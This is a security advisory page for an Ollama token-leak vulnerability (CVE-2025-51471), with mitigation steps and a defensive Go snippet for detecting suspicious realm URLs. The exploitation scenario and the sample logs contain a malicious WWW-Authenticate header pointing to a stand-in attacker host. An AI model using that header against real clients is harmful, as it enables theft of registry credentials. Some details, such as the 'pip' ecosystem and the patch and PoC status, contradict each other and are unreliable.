CVE-2025-51471: Ollama: auth token hijack via crafted WWW-Authenticate
Severity: MEDIUM | PoC available | CISA SSVC: Track

Ollama 0.6.7 leaks authentication tokens to attacker-controlled registries when a user pulls a model: a malicious realm value in WWW-Authenticate redirects the token request to an adversary's server. Any environment pulling models from untrusted or public registries is exposed. Patch immediately or restrict model pulling to verified internal registries via network policy.
What is the risk?
Effective risk is moderate-to-high in enterprise AI environments despite the medium CVSS score. The AC:H and UI:R modifiers reflect that exploitation requires a malicious registry interaction, but in practice many teams pull models ad-hoc from community sources, making social-engineering the pull trivial. The scope change (S:C) and C:H impact are the critical signals: a stolen registry token can pivot to private model repositories, exposing proprietary fine-tuned models or access to broader MLOps infrastructure. No public PoC exploitation observed and not in CISA KEV, but the gecko.security writeup lowers the bar significantly.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| Ollama | pip | — | No patch |
Do you use Ollama? You're affected.
What should I do?
Five steps:

1. PATCH: Upgrade Ollama beyond 0.6.7 immediately (track https://github.com/ollama/ollama/releases for the fix in PR #10750).
2. RESTRICT: Block outbound connections from Ollama instances to non-approved registry endpoints at the network layer; whitelist only internal or verified registries.
3. AUDIT: Review logs for /api/pull requests to external registries; look for WWW-Authenticate headers pointing to unexpected realm URLs.
4. ISOLATE: Run Ollama instances without access to production credentials; use short-lived or registry-scoped tokens rather than long-lived credentials.
5. DETECT: Alert on Ollama processes making authentication requests to domains not matching your approved registry list.
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Frequently Asked Questions
Is CVE-2025-51471 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2025-51471, increasing the risk of exploitation.
What systems are affected by CVE-2025-51471?
This vulnerability affects the following AI/ML architecture patterns: LLM inference (Ollama self-hosted), Model serving infrastructure, CI/CD model delivery pipelines, MLOps automation (automated model pulls), Local AI development environments.
What is the CVSS score for CVE-2025-51471?
CVE-2025-51471 has a CVSS v3.1 base score of 6.9 (MEDIUM). The EPSS exploitation probability is 3.84%.
What is the AI security impact?
MITRE ATLAS Techniques
- AML.T0010.003 Model
- AML.T0012 Valid Accounts
- AML.T0049 Exploit Public-Facing Application
- AML.T0091.000 Application Access Token
- AML.T0106 Exploitation for Credential Access
What are the technical details?
Original Advisory
Cross-Domain Token Exposure in server.auth.getAuthorizationToken in Ollama 0.6.7 allows remote attackers to steal authentication tokens and bypass access controls via a malicious realm value in a WWW-Authenticate header returned by the /api/pull endpoint.
Exploitation Scenario
An adversary registers a namespace on a public model hub or stands up a malicious Ollama-compatible registry. They socially engineer a developer or automate a pull via a poisoned model reference (e.g., in a requirements file, LLMOps config, or CI workflow). When Ollama calls /api/pull, the malicious registry responds with WWW-Authenticate: Bearer realm='https://attacker.com/token'. Ollama's getAuthorizationToken follows the realm URL without domain validation and forwards the user's authentication credentials. The attacker captures the token and uses it to authenticate to the victim's legitimate private model registry, exfiltrating proprietary fine-tuned models or injecting poisoned replacements.
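The scenario above turns on one missing check: the realm URL from the registry's challenge is followed wherever it points. The added example below (my own Go code, not Ollama's getAuthorizationToken, and not the fix in PR #10750) shows the origin check a client should make before sending credentials, and reuses it to implement the AUDIT and DETECT steps over a few constructed log lines; the helper names, the tab-separated log format and the hostnames are all assumptions.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// ParseChallenge maps the parameters (key="v", key='v' or key=v) of a Bearer WWW-Authenticate value by lowercased name; hypothetical parser, not Ollama's code.
var paramRe = regexp.MustCompile(`(\w+)=("([^"]*)"|'([^']*)'|([^,\s]*))`)
func ParseChallenge(h string) map[string]string {
	out := map[string]string{}
	if h = strings.TrimSpace(h); strings.HasPrefix(strings.ToLower(h), "bearer") { // ignore Basic/unknown schemes
		for _, m := range paramRe.FindAllStringSubmatch(h[6:], -1) {
			out[strings.ToLower(m[1])] = m[3] + m[4] + m[5] // only one quoting alternative is non-empty
		}
	}
	return out
}
// RealmAllowed is the origin check the advisory describes as missing: the token endpoint must be https and its host must be the registry host itself or another explicitly approved host.
func RealmAllowed(realm string, allowedHosts ...string) bool {
	u, err := url.Parse(realm)
	if err != nil || u.Scheme != "https" || u.Hostname() == "" {
		return false
	}
	for _, h := range allowedHosts {
		if strings.EqualFold(u.Hostname(), h) {
			return true
		}
	}
	return false
}
// Constructed audit lines: "<registry host>\t<WWW-Authenticate value>" (not real Ollama log output).
var sampleLog = []string{
	"registry.ollama.ai\tBearer realm=\"https://registry.ollama.ai/v2/token\",service=\"ollama\"",
	"models.example.net\tBearer realm='https://attacker.example/token'",
	"registry.ollama.ai\tBearer realm=\"http://registry.ollama.ai/v2/token\"",
}
// SuspiciousRealms returns each realm a pull should not have sent a token to: off-registry or non-https.
func SuspiciousRealms(lines []string, approved ...string) (bad []string) {
	for _, ln := range lines {
		reg, hdr, ok := strings.Cut(ln, "\t")
		if realm := ParseChallenge(hdr)["realm"]; ok && !RealmAllowed(realm, append(approved, reg)...) {
			bad = append(bad, realm)
		}
	}
	return bad
}
func main() { fmt.Println("suspicious realms:", SuspiciousRealms(sampleLog, "auth.example.com")) }
```

Run as written, it reports the attacker realm and the plain-http realm while accepting the same-host https token endpoint; the same RealmAllowed check is what a client should apply before forwarding any credential.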
Weaknesses (CWE)
CWE-345 — Insufficient Verification of Data Authenticity: The product does not sufficiently verify the origin or authenticity of data, in a way that causes it to accept invalid data.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N
References
- github.com/ollama/ollama (product)
- github.com/ollama/ollama/pull/10750 (exploit, issue)
- huntr.com/bounties/94eea285-fd65-4e01-a035-f533575ebdc2
- gecko.security/blog/cve-2025-51471 (exploit, third party)
Related Vulnerabilities
- CVE-2026-46339 (10.0): 9router: unauthenticated RCE exposes LLM API keys
- CVE-2026-42248 (9.8, same package: ollama): Ollama: silent auto-update bypasses signature check on Windows
- CVE-2025-63389 (9.8, same package: ollama): ollama: Missing Auth allows unauthenticated access
- CVE-2026-42249 (9.8, same package: ollama): Ollama: path traversal + unsigned update = silent RCE
- CVE-2026-7482 (9.1, same package: ollama): Ollama: heap OOB read leaks API keys and chat data